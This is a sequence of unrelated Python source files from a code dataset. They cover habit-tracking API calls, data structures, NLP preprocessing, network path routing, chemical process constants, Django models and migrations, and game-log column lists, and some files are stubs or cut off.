            for point in segment.points
            for extension in point.extensions
            if pattern.match(extension.tag)
        ]
        print(f"Extracted {attribute} data.")
    else:
        # Unknown attribute: warn and return an empty list.
        data = []
        print("Invalid attribute. Must be one of the following: "
              "latitude, longitude, elevation, time, cadence "
              "distance, altitude, energy, speed, verticalSpeed.")

    # List of attribute values
    return data
|
9,255 | ba34dfcad0cb9bac9c462bdf60e55dee6ba9d58d | import requests
import os
from dotenv import load_dotenv
from datetime import datetime
load_dotenv(".env")  # loads the environment file

# NOTE(review): os.getenv("USER") collides with the shell-provided $USER
# variable on Unix — confirm the .env key name is intentional.
USERNAME = os.getenv("USER")
TOKEN = os.getenv("TOKEN")

pixela_endpoint = "https://pixe.la/v1/users"

# MAKING AN ACCOUNT (one-time setup, kept disabled)
user_params = {
    "token": TOKEN,
    "username": USERNAME,
    "agreeTermsOfService": "yes",
    "notMinor": "yes",
}
# response = requests.post(url=pixela_endpoint, json=user_params) # sends the user_params as json
# print(response.text) # gives the response as a piece of text

# CREATING A GRAPH (one-time setup, kept disabled)
graph_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs"  # endpoint for the graph creation
graph_config = {
    "id": "graph1",
    "name": "Reading Graph",
    "unit": "hours",
    "type": "int",
    "color": "shibafu"
}
headers = {
    "X-USER-TOKEN": TOKEN  # Pixela authenticates via this header
}
# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers) These lines were use to create graph
# print(response.text)

# POST A PIXEL — note: prompts on stdin and performs a network call at import.
post_pixel_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1"
# today = datetime(year=2020, month=12, day=25) custom date
today = datetime.now()
formatted_date = today.strftime("%Y%m%d")
pixel_config = {
    "date": today.strftime("%Y%m%d"),
    "quantity": input("How many hours did you spend reading today? "),
}
response = requests.post(url=post_pixel_endpoint, headers=headers, json=pixel_config)  # post a new pixel
print(response.text)

# UPDATING A PIXEL (kept disabled)
update_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1/{formatted_date}"
updated_pixel = {
    "quantity": "3"
}
# response = requests.put(url=update_endpoint, headers=headers, json=updated_pixel)
# print(response.text)

# DELETING A PIXEL (kept disabled)
# delete_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1/{formatted_date}"
# response = requests.delete(url=delete_endpoint,headers=headers)
|
9,256 | 4f5f4aadfeabb13790b417b334c5f73c6d0345a7 | from queue import Queue
class Stack:
    """LIFO stack built from two FIFO queues.

    The most recently pushed element is kept at the front of q1, making pop
    and top O(1) while push is O(n).
    """

    def __init__(self):
        self.q1 = Queue()
        self.q2 = Queue()

    def empty(self):
        """True when the stack holds no elements."""
        return self.q1.empty()

    def push(self, element):
        """Insert element so it becomes the new front of q1."""
        if self.empty():
            self.q1.enqueue(element)
            return
        self.q2.enqueue(element)
        # Drain q1 behind the new element, then swap the queues' roles.
        while not self.q1.empty():
            self.q2.enqueue(self.q1.dequeue())
        self.q1, self.q2 = self.q2, self.q1

    def pop(self):
        """Remove and return the most recently pushed element."""
        return self.q1.dequeue()

    def top(self):
        """Return (without removing) the most recently pushed element."""
        return self.q1.head.next.element

    def __repr__(self):
        return str(self.q1)
def test_stack():
    """Exercise push/pop ordering and the repr of the underlying queue."""
    stack = Stack()
    for value in (1, 2, 3, 4):
        stack.push(value)
    assert str(stack) == 'head > 4 > 3 > 2 > 1 > '
    for expected in (4, 3, 2, 1):
        assert stack.pop() == expected
if __name__ == '__main__':
test_stack() |
9,257 | 0f74e0f0600c373c3ddd470f18dbb86cf213fb58 | #!/usr/bin/env python
import argparse
import sys
import os
import cmudl.hw2p2 as hw2p2
class CLI(object):
    """Git-style subcommand dispatcher for the CMU DL utilities."""

    def __init__(self):
        parser = argparse.ArgumentParser(
            description='CMU Deep Learning Utilities',
        )
        parser.add_argument('command', help='Subcommand to run')
        # parse_args defaults to [1:] for args, but you need to
        # exclude the rest of the args too, or validation will fail
        args = parser.parse_args(sys.argv[1:2])
        if not hasattr(self, args.command):
            print('Unrecognized command')
            parser.print_help()
            exit(1)
        # use dispatch pattern to invoke method with same name
        getattr(self, args.command)()

    def hw2p2(self):
        # Subcommand: forwards -s to the hw2p2 submission helper.
        parser = argparse.ArgumentParser()
        parser.add_argument('-s', type=str, default=None)
        args = parser.parse_args(sys.argv[2:])
        hw2p2.submit(args.s)

# Runs immediately when the script is executed.
CLI()
def solution(num):
    """Return the cycle length of the digit game starting from num.

    The number is written as two digits (single digits are padded with a
    trailing zero); each step forms a new two-character string from the last
    digit and the last digit of the digit sum, until the start reappears.
    """
    current = f"{num}0" if num < 10 else str(num)
    start = current
    cycles = 0
    while True:
        digit_sum = int(current[0]) + int(current[1])
        current = current[-1] + str(digit_sum)[-1]
        cycles += 1
        if current == start:
            return cycles
num = int(input())
print(solution(num)) |
class User:
    """A basic account holding a username/password pair."""

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def __str__(self):
        return f'Credentials: {self.username} - {self.password}'

    def login(self):
        print(f'Login done by "{self.username}".')
felipe = User(username='felipe', password='pass_user')
print(felipe)
felipe.login()
class Admin(User):
    """Privileged user able to approve or remove other user accounts."""

    def __init__(self, username, password, phone, email):
        super().__init__(username, password)
        self.phone = phone
        self.email = email
        self.user = None  # last account acted upon

    def remove_user_account(self, user):
        self.user = user
        message = '%s removeu conta do usuário "%s"' % (self.username, self.user.username)
        print(message)

    def accept_user_account(self, user):
        self.user = user
        message = '%s aceitou conta do usuário "%s"' % (self.username, self.user.username)
        print(message)
# Demo: create an admin, exercise its extra fields and account actions.
admin = Admin(username='marcos', password='pass_admin', phone='9999-9999', email='admin@admin.com')
print(admin)
admin.login()
print(admin.phone)
print(admin.email)
admin.remove_user_account(felipe)
joao = User(username='joao', password='123')
admin.accept_user_account(joao)
|
9,260 | f22836fc4fed22d833755db0ff34502170260766 | # -*- coding: utf-8 -*-
"""
Created on Thu May 3 09:12:11 2018
@author: shen1994
"""
import codecs
import numpy as np
def create_documents():
    """Split data/train.data into per-sentence char and label rows.

    A sentence ends at a blank line or at any terminal punctuation mark; each
    sentence is written as one tab-separated row to data/data.data (chars) and
    data/label.data (labels). Returns the number of sentences written.

    Fix: the identical flush logic appeared three times in the original; it is
    extracted into the local ``_flush`` helper.
    """
    documents_length = 0
    chars, labels = [], []
    chars_file = codecs.open("data/data.data", 'w', 'utf-8')
    labels_file = codecs.open("data/label.data", 'w', 'utf-8')

    def _flush():
        # Emit the buffered sentence to both files and reset the buffers.
        nonlocal documents_length, chars, labels
        for char in chars:
            chars_file.write(char + "\t")
        chars_file.write("\n")
        for label in labels:
            labels_file.write(label + "\t")
        labels_file.write("\n")
        documents_length += 1
        chars, labels = [], []

    with codecs.open("data/train.data", 'r', 'utf-8') as f:
        for line in f:
            line = line.strip()
            if len(line) == 0:
                # Blank line: sentence boundary (ignore if nothing buffered).
                if len(chars) != 0:
                    _flush()
            else:
                pieces = line.split()
                chars.append(pieces[0])
                labels.append(pieces[1])
                if pieces[0] in ['。', ',', ';', '!', '?']:
                    _flush()
    # Trailing sentence without a closing delimiter.
    if len(chars) != 0:
        _flush()
    chars_file.close()
    labels_file.close()
    return documents_length
def create_useful_words(embedding_model):
    """Return the embedding model's vocabulary as a list of words."""
    vocab = embedding_model.wv.vocab
    return [word for word in vocab.keys()]
def create_lexicon(word_dict):
    """Build a char->index lexicon from data/data.data, ranked by frequency.

    Indices start at 1 (0 is reserved for padding); characters absent from
    *word_dict* are remapped to -1. Returns (lexicon, reverse_lexicon).
    """
    counts = {}
    with codecs.open("data/data.data", 'r', 'utf-8') as f:
        for line in f:
            for token in line.strip().split():
                for ch in token:
                    counts[ch] = counts.get(ch, 0) + 1
    # Most frequent character first; ties keep first-seen order (stable sort).
    ranked = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
    lexicon = {ch: pos + 1 for pos, (ch, _) in enumerate(ranked)}
    # Characters with no embedding are flagged with -1.
    for ch in lexicon:
        if ch not in word_dict:
            lexicon[ch] = -1
    lexicon_reverse = {idx: ch for ch, idx in lexicon.items()}
    return lexicon, lexicon_reverse
def create_label_index():
    """Map segmentation tags to integer ids (P = pad, U = unknown)."""
    return dict(zip('PBMESU', range(6)))
def create_index_label():
    """Map integer ids back to display tags."""
    return dict(enumerate(('Pad', 'B', 'M', 'E', 'S', 'Unk')))
def create_embedding(embedding_model, embedding_size, lexicon_reverse):
    """Build the initial embedding matrix for lexicon words found in the model.

    Row 0 stays all-zero for padding; the last row gets a random vector for
    unknown words; rows 1..n carry the pretrained vectors in lexicon order.
    Returns (number_of_kept_words, weight_matrix).
    """
    vocab = create_useful_words(embedding_model)
    kept_words = [w for w in lexicon_reverse.values() if w in vocab]
    kept_count = len(kept_words)
    # +2: slot 0 for padding, final slot for the unknown-word vector.
    embedding_weights = np.zeros((kept_count + 2, embedding_size))
    for row, word in enumerate(kept_words, start=1):
        embedding_weights[row] = embedding_model.wv[word]
    embedding_weights[-1] = np.random.uniform(-1, 1, embedding_size)
    return kept_count, embedding_weights
def create_matrix(lexicon, label_2_index):
    """Translate the char/label files into parallel integer-index files."""
    with codecs.open("data/data.data", 'r', 'utf-8') as chars_in, \
         codecs.open("data/label.data", 'r', 'utf-8') as labels_in, \
         codecs.open("data/data_index.data", 'w', 'utf-8') as data_out, \
         codecs.open("data/label_index.data", 'w', 'utf-8') as label_out:
        # zip stops at the shorter file, mirroring the paired readline loop.
        for chars_line, labels_line in zip(chars_in, labels_in):
            tokens = chars_line.strip().split()
            tags = labels_line.strip().split()
            for char, label in zip(tokens, tags):
                data_out.write(str(lexicon[char]) + "\t")
                label_out.write(str(label_2_index[label]) + "\t")
            data_out.write("\n")
            label_out.write("\n")
def padding_sentences(max_len):
    """Left-pad every row of the index files with zeros to *max_len* tokens.

    Writes data/data_index_padding.data and data/label_index_padding.data;
    rows already at or beyond *max_len* are copied through unchanged.

    Fix: the original duplicated the identical pad-and-write loop for both
    files; it is extracted into the local ``_pad_file`` helper.
    """
    def _pad_file(src_path, dst_path):
        # One pass: pad each tab-separated row and write it back out.
        with codecs.open(src_path, 'r', 'utf-8') as src, \
             codecs.open(dst_path, 'w', 'utf-8') as dst:
            for line in src:
                row = line.strip().split()
                if len(row) < max_len:
                    row = [str(0)] * (max_len - len(row)) + row
                for token in row:
                    dst.write(token + "\t")
                dst.write("\n")

    _pad_file("data/data_index.data", "data/data_index_padding.data")
    _pad_file("data/label_index.data", "data/label_index_padding.data")
def maxlen_2d_list():
    """Return the token count of the longest row in data/data_index.data."""
    longest = 0
    with codecs.open("data/data_index.data", 'r', 'utf-8') as f:
        for line in f:
            longest = max(longest, len(line.strip().split()))
    return longest
|
9,261 | 65bcb4a2fbc05ee19c8a94811d369562ec5e72ff | from pulp import *
from collections import namedtuple
import networkx as nx
import itertools
from mcfpox.controller.lib import Flow, Hop
def get_host_from_ip(G, ip):
    """Return the first node of G whose 'ip' attribute equals *ip*, else None."""
    for node in G.nodes():
        if G.node[node].get('ip') == str(ip):
            return node
    return None
# https://docs.python.org/2/library/itertools.html#recipes
def pairwise(iterable):
    "s -> (s0,s1), (s1,s2), (s2, s3), ..."
    # tee() yields two independent iterators over the same data; advancing the
    # second by one and zipping produces consecutive overlapping pairs.
    # NOTE: itertools.izip is Python 2 only (this module also uses the Python 2
    # print statement elsewhere); on Python 3 this would be plain zip().
    a, b = itertools.tee(iterable)
    next(b, None)
    return itertools.izip(a, b)
def widest_path(G, src, dst):
    # Widest-path (maximum-bottleneck) search from src to dst, Dijkstra-style:
    # repeatedly settle the frontier node with the largest bottleneck capacity.
    # Python 2 code (print statement below). Returned path excludes src itself.
    S = set([src])                                 # settled nodes
    T = set([n for n in G.nodes() if n != src])    # not-yet-settled nodes
    print S, T
    N = G.nodes()
    # B[n][k]: best known bottleneck capacity from n to k (0 when no edge).
    B = {}
    for n in N:
        b = {}
        for k in N:
            if k == n:
                continue
            try:
                b[k] = G.edge[n][k]['capacity']
            except KeyError:
                b[k] = 0
        B[n] = b
    P = {n:[] for n in N}   # P[n]: widest path discovered to n (src excluded)
    while True:
        k = None
        highest = 0
        neighbors = set([])  # NOTE(review): never used — dead variable
        for n in S:
            for m in G[n]:
                if m in S:
                    continue
                # NOTE(review): this overwrites B[src][m] with the raw edge
                # capacity, discarding any wider bottleneck computed by the
                # relaxation step below — looks suspicious; confirm intended.
                B[src][m] = G.edge[n][m]['capacity']
                if B[src][m] > highest:
                    k = m
                    highest = B[src][m]
                    P[k] = P[n] + [k]
        S.add(k)
        T.remove(k)
        if not T:
            break
        # Relax: routing through the newly settled k may widen the bottleneck.
        for n in T:
            old = B[src][n]
            new = min(B[src][k], B[k][n])
            B[src][n] = max(old, new)
            if new > old:
                P[n] = P[k] + [n]
    return P[dst]
def objective(graph, flows):
    """ Return a list of paths through the graph for each flow.

    Args:
        graph:
            A nx.Graph, annotated with network information including
            IP addresses for hosts and port numbers for each link.
        flows:
            A list of (mcfpox.controller.lib.Flow, demand) pairs — the code
            below unpacks two items per element — representing 5-tuples of
            flows to route through the network.

    Returns:
        A dict mapping each routable flow to a path through the graph,
        expressed as a list of mcfpox.controller.lib.Hop objects. Flows whose
        endpoints cannot be resolved are silently omitted from the result.
    """
    G = graph.copy()   # work on a copy so capacity bookkeeping stays local
    rules = {}
    # Greedy heuristic: place the highest-demand flows first.
    flows.sort(key=lambda a: a[1], reverse=True)
    for flow,demand in flows:
        src = get_host_from_ip(G, flow.nw_src)
        dst = get_host_from_ip(G, flow.nw_dst)
        if not (src and dst):
            # One endpoint is not a known host; skip this flow.
            continue
        if not (src in G.nodes() and dst in G.nodes()):
            continue
        path = widest_path(G, src, dst)
        hops = []
        for a,b in pairwise(path):
            # Hop records the switch dpid (node name minus its leading letter,
            # e.g. 's3' -> 3) and the egress port toward the next node.
            hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))
            # Reserve the flow's demand on both directions of the edge.
            G.edge[a][b]['capacity'] -= demand
            G.edge[b][a]['capacity'] -= demand
        rules[flow] = hops
    return rules
|
9,262 | 0dcf90514543a1ca801e82cd402b3e1002b1f5d0 | # aitoff projection
# see:
# https://en.wikipedia.org/wiki/Aitoff_projection
def aitoff_projection(theta, phi):
    """Project spherical angles (radians) to Aitoff map coordinates.

    theta is shifted so the map is centered, and x is offset by +180 so the
    result lies in [0, 360]; y lies in [-90, 90].
    """
    import numpy as np
    lon = theta - np.pi
    cos_lat = np.cos(phi)
    alpha = np.sqrt(1 + cos_lat * np.cos(lon / 2))
    x = 180 * cos_lat * np.sin(lon / 2) / alpha + 180
    y = 90 * np.sin(phi) / alpha
    return x, y
|
9,263 | 3471f02f507104202c1e49440172f120ba17730f | from FluidStream import *
# List of chemicals and their constant properties
# Column order for each CHEMICALS entry below.
CHEMICALS_KEY_GUIDE = ['MW' , 'Density']
# name -> [molecular weight, density]; 'NA' where a compound has no single
# molecular weight (mixtures / biomass). Units presumably g/mol and g/mL —
# TODO confirm against the source data.
CHEMICALS = {
    'Bacteria'            : ['NA'     , 1.05  ],
    'Calcium Carbonate'   : [100.087  , 2.71  ],
    'Calcium Lactate'     : [218.22   , 1.494 ],
    'Corn Steep Liquor'   : ['NA'     , 1.2326],
    'Glucose'             : [180.156  , 1.54  ],
    'Lactic Acid'         : [90.08    , 1.206 ],
    'Octanol'             : [130.231  , .824  ],
    'Tween 80'            : ['NA'     , 1.07  ],
    'Water'               : [18.015   , .995  ],
    'Water/Glucose 10%'   : [34.2291  , 1.0375]
}
SOLVE_FOR_PRODUCTION = True
PRODUCTION_TO_SOLVE = 100000000
def convert_mass_to_concentration(fluidStream, component):
    # TODO(review): incomplete stub — reads the stream's total mass but never
    # uses `component` and returns nothing; presumably meant to return the
    # component's mass fraction or g/L concentration. Confirm and implement.
    total_mass = fluidStream.TotalMass
def component_mass_to_volume(mass, component):
    """Return the volume occupied by *mass* of *component*.

    Densities are read from CHEMICALS[component][1]. Since density = mass /
    volume, the volume is mass DIVIDED by density — the original multiplied
    by density, which yields mass·density, not a volume.
    """
    component_density = CHEMICALS[component][1]
    component_volume = mass / component_density
    return component_volume
# Bacterial Growth Curve
# TIME_INIT --> hours
TIME_INIT = 0
# C_BACT_INIT --> g/L
C_BACT_INIT = .7
# C_GLUC_INIT --> g/L
C_GLUC_INIT = 100.0
# C_LA_INIT --> g/L
C_LA_INIT = 12.57
# C_TWEEN_INIT --> g/L
C_TWEEN_INIT = 1.0
# dBACT_dT -- > g/L*h
dBACT_dT_INIT = 0.0
FERMENT_IN = {
'Bacteria Concentration' : C_BACT_INIT,
'Glucose Concentration' : C_GLUC_INIT,
'Lactic Acid Concentration' : C_LA_INIT,
'Tween 80 Concentration' : C_TWEEN_INIT
}
# HOLDING TANK SPECS
# Initial Fermentation Water Charge in Liters
FERMENT_WATER_VOL = 750000
# Number of Fermentation Vessels
FERMENT_VESSEL_COUNT = 4
# Runtime of Fermentation Process
FERMENT_RUNTIME = 32
# Downtime of Fermentation Process
FERMENT_DOWNTIME = 8
# Total Runtime of Each Fermentation Batch
FERMENT_BATCH_TIME = FERMENT_RUNTIME + FERMENT_DOWNTIME
FERMENT_CONST = {
'Water Volume' : FERMENT_WATER_VOL,
'Vessel Count' : FERMENT_VESSEL_COUNT,
'Runtime' : FERMENT_RUNTIME,
'Downtime' : FERMENT_DOWNTIME,
'Batch Time' : FERMENT_BATCH_TIME }
# Acid Dissociation Constant Ka
SALTS_pKa = 3.86
SALTS_Ka = pow(10, (-1*SALTS_pKa))
# Target maximum broth pH.
MAX_pH = 3.8
# Henderson–Hasselbalch ratio [HA]/[A-] = 10^(pKa - pH) at the target pH.
pKa_pH_CALC = pow(10, (SALTS_pKa - MAX_pH))
# Molecular weights pulled from the CHEMICALS table.
MW_SALT = CHEMICALS['Calcium Lactate'][0]
MW_LA = CHEMICALS['Lactic Acid'][0]
|
9,264 | 2c1ea45d3c7ee822ec58c2fadaf7fc182acc4422 | # Generated by Django 2.1 on 2018-12-09 21:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='replays',
name='id',
),
migrations.AddField(
model_name='replays',
name='oponent',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='replays',
name='player',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='replays',
name='processed',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='replays',
name='title',
field=models.CharField(max_length=200, primary_key=True, serialize=False),
),
]
|
9,265 | fa948838b5c2d688fe8c748166f23ffc8e677f93 | columns = ['account',
'name',
'Death',
'archetype',
'profession',
'elite',
'phases.All.actual_boss.dps',
'phases.All.actual.dps',
'phases.All.actual_boss.flanking',
'phases.All.actual_boss.scholar',
'phases.All.actual_boss.condi_dps',
'phases.All.actual_boss.power_dps',
'phases.All.buffs.aegis',
'phases.All.buffs.alacrity',
'phases.All.buffs.assassins_presence',
'phases.All.buffs.banner_defence',
'phases.All.buffs.banner_discipline',
'phases.All.buffs.banner_strength',
'phases.All.buffs.banner_tactics',
'phases.All.buffs.empower_allies',
'phases.All.buffs.fury',
'phases.All.buffs.glyph_of_empowerment',
'phases.All.buffs.lead_attacks',
'phases.All.buffs.lotus_training',
'phases.All.buffs.might',
'phases.All.buffs.naturalistic_resonance',
'phases.All.buffs.pinpoint_distribution',
'phases.All.buffs.protection',
'phases.All.buffs.quickness',
'phases.All.buffs.regen',
'phases.All.buffs.resist',
'phases.All.buffs.retaliation',
'phases.All.buffs.soothing_mist',
'phases.All.buffs.spirit_of_frost',
'phases.All.buffs.spotter',
'phases.All.buffs.stab',
'phases.All.buffs.stone_spirit',
'phases.All.buffs.storm_spirit',
'phases.All.buffs.sun_spirit',
'phases.All.buffs.swift',
'phases.All.buffs.vampiric_presence',
'phases.All.buffs.vigor',
'phases.All.buffs_out.aegis',
'phases.All.buffs_out.alacrity',
'phases.All.buffs_out.assassins_presence',
'phases.All.buffs_out.banner_defence',
'phases.All.buffs_out.banner_discipline',
'phases.All.buffs_out.banner_strength',
'phases.All.buffs_out.banner_tactics',
'phases.All.buffs_out.empower_allies',
'phases.All.buffs_out.fury',
'phases.All.buffs_out.glyph_of_empowerment',
'phases.All.buffs_out.lead_attacks',
'phases.All.buffs_out.lotus_training',
'phases.All.buffs_out.might',
'phases.All.buffs_out.naturalistic_resonance',
'phases.All.buffs_out.pinpoint_distribution',
'phases.All.buffs_out.protection',
'phases.All.buffs_out.quickness',
'phases.All.buffs_out.regen',
'phases.All.buffs_out.resist',
'phases.All.buffs_out.retaliation',
'phases.All.buffs_out.soothing_mist',
'phases.All.buffs_out.spirit_of_frost',
'phases.All.buffs_out.spotter',
'phases.All.buffs_out.stab',
'phases.All.buffs_out.stone_spirit',
'phases.All.buffs_out.storm_spirit',
'phases.All.buffs_out.sun_spirit',
'phases.All.buffs_out.swift',
'phases.All.buffs_out.vampiric_presence',
'phases.All.buffs_out.vigor',
'phases.All.events.dead_time',
'phases.All.events.deaths',
'phases.All.events.disconnect_time',
'phases.All.events.disconnects',
'phases.All.events.down_time',
'phases.All.events.downs',
'phases.All.received.dps',
'phases.All.shielded.dps']
old_columns = ['account',
'name',
'Death',
'archetype',
'profession',
'elite',
'phases.All.actual_boss.dps',
'phases.All.actual.dps',
'phases.All.actual_boss.flanking',
'phases.All.actual_boss.scholar',
'phases.All.actual_boss.condi_dps',
'phases.All.actual_boss.power_dps',
'phases.All.buffs.alacrity',
'phases.All.buffs.assassins_presence',
'phases.All.buffs.banner_defence',
'phases.All.buffs.banner_discipline',
'phases.All.buffs.banner_strength',
'phases.All.buffs.banner_tactics',
'phases.All.buffs.empower_allies',
'phases.All.buffs.fury',
'phases.All.buffs.glyph_of_empowerment',
'phases.All.buffs.gotl',
'phases.All.buffs.lead_attacks',
'phases.All.buffs.lotus_training',
'phases.All.buffs.might',
'phases.All.buffs.naturalistic_resonance',
'phases.All.buffs.pinpoint_distribution',
'phases.All.buffs.protection',
'phases.All.buffs.quickness',
'phases.All.buffs.soothing_mist',
'phases.All.buffs.spirit_of_frost',
'phases.All.buffs.spotter',
'phases.All.buffs.stone_spirit',
'phases.All.buffs.storm_spirit',
'phases.All.buffs.sun_spirit',
'phases.All.buffs.vampiric_presence',
'phases.All.buffs_out.alacrity',
'phases.All.buffs_out.assassins_presence',
'phases.All.buffs_out.banner_defence',
'phases.All.buffs_out.banner_discipline',
'phases.All.buffs_out.banner_strength',
'phases.All.buffs_out.banner_tactics',
'phases.All.buffs_out.empower_allies',
'phases.All.buffs_out.fury',
'phases.All.buffs_out.glyph_of_empowerment',
'phases.All.buffs_out.gotl',
'phases.All.buffs_out.lead_attacks',
'phases.All.buffs_out.lotus_training',
'phases.All.buffs_out.might',
'phases.All.buffs_out.naturalistic_resonance',
'phases.All.buffs_out.pinpoint_distribution',
'phases.All.buffs_out.protection',
'phases.All.buffs_out.quickness',
'phases.All.buffs_out.retaliation',
'phases.All.buffs_out.soothing_mist',
'phases.All.buffs_out.spirit_of_frost',
'phases.All.buffs_out.spotter',
'phases.All.buffs_out.stone_spirit',
'phases.All.buffs_out.storm_spirit',
'phases.All.buffs_out.sun_spirit',
'phases.All.buffs_out.vampiric_presence',
'phases.All.events.dead_time',
'phases.All.events.deaths',
'phases.All.events.disconnect_time',
'phases.All.events.disconnects',
'phases.All.events.down_time',
'phases.All.events.downs',
'phases.All.received.dps',
'phases.All.shielded.dps']
vg_mechanics = ['phases.All.mechanics.Bullets Eaten',
'phases.All.mechanics.Teleports']
gors_mechanics = ['phases.All.mechanics.Ghastly Imprisonments',
'phases.All.mechanics.Spectral Darkness',
'phases.All.mechanics.Unmitigated Spectral Impacts']
sab_mechanics = []
sloth_mechanics = ['phases.All.mechanics.Spores Blocked',
'phases.All.mechanics.Spores Received',
'phases.All.mechanics.Tantrum Knockdowns',
'phases.All.mechanics.Toxic Cloud Breathed',
'phases.All.mechanics.Volatile Poison Carrier']
matt_mechanics = ['phases.All.mechanics.Burning Stacks Received',
'phases.All.mechanics.Corrupted',
'phases.All.mechanics.Moved While Unbalanced',
'phases.All.mechanics.Sacrificed',
'phases.All.mechanics.Shards Absorbed',
'phases.All.mechanics.Surrender',
'phases.All.mechanics.Well of the Profane Carrier']
kc_mechanics = ['phases.All.mechanics.Correct Orb',
'phases.All.mechanics.Wrong Orb']
xera_mechanics = ['phases.All.mechanics.Derangement']
cairn_mechanics = ['phases.All.mechanics.Displacement',
'phases.All.mechanics.Meteor Swarm',
'phases.All.mechanics.Shared Agony',
'phases.All.mechanics.Spatial Manipulation']
mo_mechanics = ['phases.All.mechanics.Claim',
'phases.All.mechanics.Dispel',
'phases.All.mechanics.Enemy Tile',
'phases.All.mechanics.Protect',
"phases.All.mechanics.Soldier's Aura"]
sam_mechanics = ['phases.All.mechanics.Anguished Bolt',
'phases.All.mechanics.Big Friend',
'phases.All.mechanics.Bludgeon',
'phases.All.mechanics.Charge',
'phases.All.mechanics.Claw',
'phases.All.mechanics.Fixate',
'phases.All.mechanics.Inevitable Betrayl',
'phases.All.mechanics.Prisoner Sweep',
'phases.All.mechanics.Shockwave',
'phases.All.mechanics.Small Friend',
'phases.All.mechanics.Spear Impact']
deimos_mechanics = ['phases.All.mechanics.Annihilate',
'phases.All.mechanics.Demonic Shockwave',
'phases.All.mechanics.Mind Crush',
'phases.All.mechanics.Rapid Decay',
'phases.All.mechanics.Soul Feast',
'phases.All.mechanics.Tear Consumed',
'phases.All.mechanics.Teleports']
sh_mechanics = ['phases.All.mechanics.Inner Vortex',
'phases.All.mechanics.Necrosis Received',
'phases.All.mechanics.Outer Vortex',
'phases.All.mechanics.Quad Slash',
'phases.All.mechanics.Scythe Hits',
'phases.All.mechanics.Soul Rift']
dhuum_mechanics = ['phases.All.mechanics.Death Marked',
'phases.All.mechanics.Dhuum Gaze',
'phases.All.mechanics.Fissured',
'phases.All.mechanics.Messenger',
'phases.All.mechanics.Putrid Bomb',
'phases.All.mechanics.Shackle Hits',
'phases.All.mechanics.Snatched',
'phases.All.mechanics.Sucked']
|
9,266 | 7fc239e7f44c5f6a8e5bebe3e4910aee4d8e4af3 | from django.test import TestCase
# Create your tests here.
def Add_course(self, user):
    """Stub: enroll *user* in a course.

    The original def had no body at all (a SyntaxError in context); it is kept
    as an explicit no-op until the enrollment logic is written.
    """
    # TODO: implement enrollment logic.
    pass
|
9,267 | 7cfbc36cc6cd6ff7c30f02d979667448f2003546 | def solution(n):
answer = []
for i in range(1,n+1):
if n % i == 0:
answer.append(i)
return sum(answer)
def solution2(n):
    """One-line variant: sum of all positive divisors of n."""
    return sum(filter(lambda d: n % d == 0, range(1, n + 1)))
print(solution(12))
print(solution(5))
print(solution2(12))
print(solution2(5))
# n return
# 12 28
# 5 6 |
9,268 | 2fd33439d4403ec72f890a1d1b4f35f2b38d033b | from enum import unique
from django.db import models
import secrets
import string
CARD_PACK_CHOICES = (
('1', 'Traditional Cards'),
('2', 'Special Cards'),
('3', 'Other Themed Cards')
)
MARKER_CHOICES = (
('1', 'Plastic Dots'),
('2', 'Quarters'),
('3', 'Beans')
)
def generate_game_code() -> int:
    """ Generates a unique game code.

    Returns
    -------
    int
        - a unique 7 digit numerical code
    """
    # Fix: the digit alphabet is loop-invariant — build it once, not per retry.
    code_options = string.digits
    while True:
        candidate = ''.join(secrets.choice(code_options) for _ in range(7))
        # .exists() asks the DB a cheap yes/no instead of counting all matches.
        if not Game.objects.filter(game_code=candidate).exists():
            return int(candidate)
def generate_player_id() -> str:
    """Generates a unique player id.

    Returns
    -------
    str
        - a unique 5 digit alphanumeric code

    Note: the original annotated the return as ``string``, which resolves to
    the stdlib *module*, not a type; corrected to ``str``.
    """
    # Uppercase letters + digits; hoisted out of the retry loop (invariant).
    code_options = string.ascii_uppercase + string.digits
    while True:
        candidate = ''.join(secrets.choice(code_options) for _ in range(5))
        if not Player.objects.filter(player_id=candidate).exists():
            return candidate
# Create your models here.
class Game( models.Model):
    """ Model that describes a loteria game
    Fields
    ------
    cards_id : int
        - the id of the card theme chosen by user during creation of game.
    created_at : dateTime
        - the time that the game was started.
    game_code : int
        - a unique 7 digit code assigned during creation
          needed to join games.
    host : string
        - the session key of the person who started the game
          ensures that users do not have more than 1 running game.
    game_over : bool
        - defaults to True for now but will default to False upon creation.
    marker_id : int
        - the id of the marker type chosen by user during creation of game.
    Notes
    -----
    - Considering making game_code primary key instead
    """
    # default 0 will just be regular loteria cards
    # TODO cards_id and marker_id should be choices not harded coded values
    game_code = models.IntegerField(null=False, default=generate_game_code, unique=True)
    created_at = models.DateTimeField(auto_now_add=True)
    host = models.CharField(max_length=100, unique=True)  # creator's session key
    cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1')
    marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1')
    # NOTE(review): docstring says this should eventually default to False.
    game_over = models.BooleanField(default=True)
class Player(models.Model):
    """ Model that describes a Player in the Game
    Attributes
    ----------
    name : string
        the display name of the player.
    wins : int
        the number of times this player has won.
    losses : int
        the number of times this player has lost.
    player_id : string
        the id assigned to a player during a game.
    game_code : int
        the game code of the game joined, will be null if no game has been joined.
        NOTE(review): the field below is declared null=False — the docstring
        and the schema disagree; confirm which is intended.
    host_key : string
        presumably the session key of the player's client — TODO confirm.
    """
    player_id = models.CharField(max_length=15, default=generate_player_id, unique=True)
    name = models.CharField(max_length=100, unique=False)
    game_code = models.IntegerField(null=False, unique=False)
    wins = models.IntegerField(null=False, default=0)
    losses = models.IntegerField(null=False, default=0)
    host_key = models.CharField(max_length=100, unique=True)
|
9,269 | 08c5f5ac568b7575d8082976336a5893951b53c2 | import cv2 as cv
import numpy as np
# Draw primitives on a blank 512x512 BGR canvas and display it in a window.
